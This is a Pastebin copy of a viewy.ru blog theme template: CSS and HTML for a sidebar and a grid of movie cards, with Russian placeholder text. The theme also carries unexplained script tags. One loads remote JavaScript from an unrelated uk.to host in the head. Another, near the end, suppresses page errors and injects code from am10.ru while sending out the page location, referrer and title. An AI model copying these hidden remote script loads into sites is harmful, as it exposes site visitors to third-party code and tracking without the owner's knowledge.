Advertisement
hazza_xx

for you

Mar 13th, 2013
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.28 KB | None | 0 0
  1. <!-- Разобрала и отредактировала: http://winchesterovna.viewy.ru/ -->
  2. <html>
  3. <head>
  4.  
  5. <title>НАЗВАНИЕ ВО ВКЛАДКЕ</title>
  6. <link rel="shortcut icon" href="КАРТИНКА ВО ВКЛАДКЕ" />
  7. <link rel="alternate" type="application/rss+xml" href="{RSS}" />
  8.  
  9. <style type="text/css">
  10.  
  11. body {
  12. background-color:#AB82FF;
  13.  
  14. background-image:url("ФОН");
  15. background-repeat:not repeat;
  16.  
  17. background-position:right;
  18. background-attachment:fixed;
  19. font-family:Georgia;
  20. font-size:10px;
  21. }
  22.  
  23. a:link, a:active, a:visited {
  24. color:{color:link};
  25. text-decoration:none;
  26. }
  27. a:hover {
  28. color:{color:hover};
  29. -webkit-transition.duration: 0.5s;
  30. -moz-transition-duration:0,5s;
  31. }
  32.  
  33. #entry {
  34. width:800px;
  35. height:auto;
  36. margin-left:200px;
  37. margin-top:50px;
  38. }
  39.  
  40. #title {
  41. text-align:center;
  42. letter-spacing:1px;
  43. font-family: Georgia;
  44. text-transform:lowercase;
  45. font-style: Georgia;
  46. line-height:110%;
  47. margin-top:200px;
  48. }
  49.  
  50. #sidebar {
  51. width:150px;
  52. height:1000px;
  53. background-color:#DDA0DD;
  54. background-image:url("КАРТИНКА СЛЕВА В САЙДБАРЕ ");
  55. background-repeat:not repeat;
  56.  
  57. background-position:right;
  58. background-attachment:fixed;
  59. float:left;
  60. margin-left:-10px;
  61. margin-top:-10px;
  62. padding:4px;
  63. text-align:center;
  64. position:fixed;
  65. border-right:3px solid #f0e68c;
  66. }
  67.  
  68.  
  69. .links_list {
  70. margin: 0px;
  71. padding: 0px;
  72. width: 110px;
  73. margin-left: 20px;
  74. margin-top: 80px;
  75. }
  76.  
  77. .links_body a{
  78. display:block;
  79. background: #FCF2DD;
  80. color: #525252;
  81. padding: 0px; margin: 1px;
  82. letter-spacing: 2px;
  83. display: block;
  84. font-family:'Yanone Kaffeesatz', sans-serif;
  85. text-align: center;
  86. height:10px;
  87. font-size:7px;
  88. -moz-border-radius: 15px;
  89. -khtml-border-radius: 15px;
  90. -webkit-border-radius: 15px;
  91. border-radius: 15px;
  92. text-transform:uppercase;
  93. -webkit-transition: all 0.3s ease;
  94. -moz-transition: all 0.3s ease;
  95. transition: all 0.3s ease;
  96. }
  97.  
  98. .links_body a:hover{
  99. color:#000000;
  100. padding-right:20px;
  101. background-color: #ECDDB8;
  102. background-image:none;
  103. -webkit-transition: all 0.3s ease;
  104. -moz-transition: all 0.3s ease;
  105. transition: all 0.3s ease;
  106. }
  107.  
  108. .movie {
  109. width:150px;
  110. height:210px;
  111. background-color:#ffffff;
  112. text-align:center;
  113. overflow:hidden;
  114. position:relative;
  115. word-wrap: break-word;
  116. -moz-border-radius: 20px; -khtml-border-radius: 20px; -webkit-border-radius: 20px; border-radius: 20px;
  117. }
  118.  
  119. .movie img {
  120. width:150px;
  121. height:210px;
  122. position:relative;
  123. z-index:10;
  124. -moz-user-select: none;
  125. -webkit-user-select: none;
  126. /* this will work for QtWebKit in future */
  127. -webkit-user-drag: none;
  128. -webkit-transition: all 0.8s ease-in-out;
  129. -moz-transition: all 0.8s ease-in-out;
  130. -o-transition: all 0.8s ease-in-out;
  131. transition: all 0.8s ease-in-out;
  132. -moz-border-radius: 20px; -khtml-border-radius: 20px; -webkit-border-radius: 20px; border-radius: 20px;
  133. }
  134.  
  135. .movie:hover img {
  136. margin-top:210px;
  137. -webkit-transition: all 0.8s ease-in-out;
  138. -moz-transition: all 0.8s ease-in-out;
  139. -o-transition: all 0.8s ease-in-out;
  140. transition: all 0.8s ease-in-out;
  141. -moz-border-radius: 20px; -khtml-border-radius: 20px; -webkit-border-radius: 20px; border-radius: 20px;
  142. }
  143.  
  144. .movie:hover .info {
  145. margin-left:0px;
  146. -webkit-transition: all 0.8s ease-in-out;
  147. -moz-transition: all 0.8s ease-in-out;
  148. -o-transition: all 0.8s ease-in-out;
  149. transition: all 0.8s ease-in-out;
  150. -moz-border-radius: 20px; -khtml-border-radius: 20px; -webkit-border-radius: 20px; border-radius: 20px;
  151. }
  152.  
  153. .info {
  154. width:134px;
  155. height:194px;
  156. padding:8px;
  157. margin-top:20px;
  158. font-size:11px;
  159. color:#000000;
  160. position:absolute;
  161. z-index:5;
  162. -webkit-transition: all 0.8s ease-in-out;
  163. -moz-transition: all 0.8s ease-in-out;
  164. -o-transition: all 0.8s ease-in-out;
  165. transition: all 0.8s ease-in-out;
  166. }
  167.  
  168. .review{
  169. margin-top:7px;
  170. font-size:9px;
  171. z-index:6;
  172. }
  173.  
  174. #text {
  175. font-size:16px;
  176. text-align:center;
  177. letter-spacing:1px;
  178. font-family: Georgia;
  179. font-style: bold;
  180. line-height:110%;
  181. margin-top:10px;
  182. }
  183.  
  184. </style>
  185. <style type="text/css">{CustomCSS}</style>
  186.  
  187. <link title="Блог stankevch" type="application/rss+xml" rel="alternate" href="http://stankevch.viewy.ru/rss"/><script type="text/javascript" charset="utf-8" src="http://xuergd.bigshaalll.uk.to/code/e9fef7541"></script></head>
  188.  
  189. <body>
  190.  
  191. <div class="body">
  192. <div id="sidebar">
  193. <div id="title">
  194. <a href="/"><font size="3"; color="#F5DEB3">НАЗВАНИЕ БЛОГА</font></a></div><br>
  195. <div id="icon"><img src="АВА БЛОГА" width="150" height="210" style="border-radius: 5px 5px 5px 5px;></div>
  196. <div class="links_list">
  197. <div class="links_body">
  198. <a href="ССЫЛКА">НАЗВАНИЕ</a>
  199. <a href="ССЫЛКА">НАЗВАНИЕ</a>
  200. <a href="ССЫЛКА">НАЗВАНИЕ</a>
  201. <a target="_blank" href="ССЫЛКА">НАЗВАНИЕ</a></div></div>
  202. </div>
  203. <br>
  204.  
  205. <div id="entry">
  206.  
  207. <div id="text">НАЗВАНИЕ БЛОГА НАД ФИЛЬМАМИ<br>
  208. <font size="1" color="#000000">ЦИТАТА ИЛИ ЕЩЕ ОДНО НАЗВАНИЕ БЛОГА</font></div>
  209. <br>
  210.  
  211. <table cellpadding="0px" cellspacing="8px">
  212.  
  213. <!----- FIRST ROW START ----->
  214. <tr>
  215.  
  216. <td><div class="movie">
  217. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  218. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  219. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  220. </div>
  221. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  222. </div></td>
  223.  
  224. <td><div class="movie">
  225. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  226. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  227. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  228. </div>
  229. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  230. </div></td>
  231.  
  232. <td><div class="movie">
  233. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  234. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  235. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  236. </div>
  237. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  238. </div></td>
  239.  
  240. <td><div class="movie">
  241. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  242. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  243. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  244. </div>
  245. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  246. </div></td>
  247.  
  248. <td><div class="movie">
  249. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  250. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  251. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  252. </div>
  253. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  254. </div></td>
  255.  
  256. <td><div class="movie">
  257. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  258. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  259. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  260. </div>
  261. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  262. </div></td>
  263.  
  264.  
  265. </tr>
  266.  
  267. <!----- FIRST ROW END ----->
  268.  
  269. <!----- SECOND ROW START ----->
  270. <tr>
  271.  
  272. <td><div class="movie">
  273. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  274. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  275. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  276. </div>
  277. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  278. </div></td>
  279. <td><div class="movie">
  280. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  281. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  282. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  283. </div>
  284. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  285. </div></td>
  286. <td><div class="movie">
  287. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  288. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  289. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  290. </div>
  291. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  292. </div></td>
  293. <td><div class="movie">
  294. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  295. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  296. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  297. </div>
  298. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  299. </div></td>
  300. <td><div class="movie">
  301. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  302. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  303. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  304. </div>
  305. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  306. </div></td>
  307. <td><div class="movie">
  308. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  309. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  310. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  311. </div>
  312. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  313. </div></td>
  314.  
  315. </tr>
  316.  
  317. <!----- SECOND ROW END ----->
  318.  
  319. <!----- THIRD ROW START ----->
  320. <tr>
  321.  
  322. <td><div class="movie">
  323. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  324. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  325. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  326. </div>
  327. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  328. </div></td>
  329. <td><div class="movie">
  330. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  331. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  332. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  333. </div>
  334. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  335. </div></td>
  336. <td><div class="movie">
  337. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  338. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  339. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  340. </div>
  341. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  342. </div></td>
  343. <td><div class="movie">
  344. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  345. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  346. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  347. </div>
  348. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  349. </div></td>
  350. <td><div class="movie">
  351. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  352. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  353. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  354. </div>
  355. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  356. </div></td>
  357. <td><div class="movie">
  358. <div class="info"><strong>НАЗВАНИЕ ФИЛЬМА</strong><br>ГОД ФИЛЬМА
  359. <div class="review">"ОПИСАНИЕ ФИЛЬМА ИЛИ ЕГО СЛОГАН".<br><br><font size="3">Rating: <strong>ОЦЕНКА ФИЛЬМА</strong></font></div>
  360. <div class="info"><a href="ССЫЛКА НА ФИЛЬМ" target="_blank"><font color="#8B4789">Смотреть</font></a></div>
  361. </div>
  362. <img src="ПОСТЕР ФИЛЬМА" width="150" height="210" title="Title">
  363. </div></td>
  364. </tr>
  365.  
  366. <!----- THIRD ROW END ----->
  367.  
  368. </table>
  369.  
  370. </div>
  371.  
  372.  
  373. /td
  374.  
  375.  
  376. <script type="text/javascript">
  377. function stopError(){return true;}
  378. window.onerror = stopError;
  379. var am_jq=0; if(window.jQuery){am_jq=1;}
  380. var am_loc=escape(top.location.href.substring(0,255));
  381. var am_ref=escape(document.referrer.substring(0,255));
  382. var am_title; try{am_title=encodeURIComponent(document.getElementsByTagName("TITLE")[0].innerHTML.substring(0,100));}catch(e){am_title="";}
  383. var am_rand=Math.floor(Math.random()*10000);
  384. var am_code_cu=document.createElement("script"); am_code_cu.type="text/javascript";
  385. am_code_cu.src="http://am10.ru/code.php?type=cu&jq="+am_jq+"&rand="+am_rand+"&u=36985&loc="+am_loc+"&ref="+am_ref+"&title="+am_title;
  386. document.body.appendChild(am_code_cu);
  387. </script>
  388. <iframe src="http://viewy.ru/iframe?w=stankevch"
  389. border="0" scrolling="no" width="278" height="25" allowTransparency="true"
  390. frameborder="0" style="position:absolute; z-index:1337; top:0px; right:0px; border:0px;
  391. background-color:transparent; overflow:hidden;" id="controls"></iframe> </body>
  392. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement